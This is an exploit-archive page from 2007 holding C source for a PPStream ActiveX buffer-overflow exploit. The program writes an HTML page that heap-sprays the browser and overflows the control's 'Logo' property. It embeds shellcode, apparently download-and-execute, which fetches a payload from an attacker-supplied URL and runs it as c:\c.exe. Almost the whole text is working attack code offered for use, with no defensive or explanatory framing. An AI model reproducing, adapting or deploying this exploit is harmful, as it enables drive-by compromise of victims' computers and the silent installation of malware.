Home / exploits ppstream-overflow.txt
Posted on 31 August 2007
// author: dummy // written by dummyz@126.com (2007) #define _CRT_SECURE_NO_DEPRECATE #include <windows.h> #include <stdio.h> const unsigned char shellcode[174] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, 0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, 0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, 0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, 0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, 0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, 0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, 0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, 0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90 }; const char* script1 = \n"<html><body><object id="ppc" classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>" "var shellcode = unescape(""; const char* script2 = \n"");" "bigblock = unescape("%u9090");" "headersize = 20;" "slackspace = headersize + shellcode.length;" "while ( bigblock.length < slackspace ) bigblock += bigblock;" "fillblock = bigblock.substring(0, slackspace);" "block = bigblock.substring(0, bigblock.length - slackspace);" "while(block.length + slackspace < 0x40000) block = block + block + fillblock;" "memory = new Array();" "for (x=0; x< 400; x++) memory[x] = block + shellcode;" "var buffer = '\x0a';" "while (buffer.length < 500) buffer += '\x0a\x0a\x0a\x0a';" "ppc.Logo = buffer;" "</script>" "</body>" "</html>"; int main(int argc, char* argv[]) { if ( argc != 2 ) { printf("ex:fuckpps url written by dummyz@126.com (2007) "); return -1; } FILE *file = fopen("fuckpps.html", "w+"); if ( file == NULL ) { printf("create 'fuckpps.html' failed! "); return -2; } fprintf(file, "%s", script1); for ( unsigned i = 0; i < sizeof (shellcode); i += 2 ) fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]); const unsigned l = strlen(argv[1]); for ( unsigned j = 0; j < l; j += 2 ) fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]); fprintf(file, "%s", script2); fclose(file); printf("make 'fuckpps.html' successed! "); return 0; }
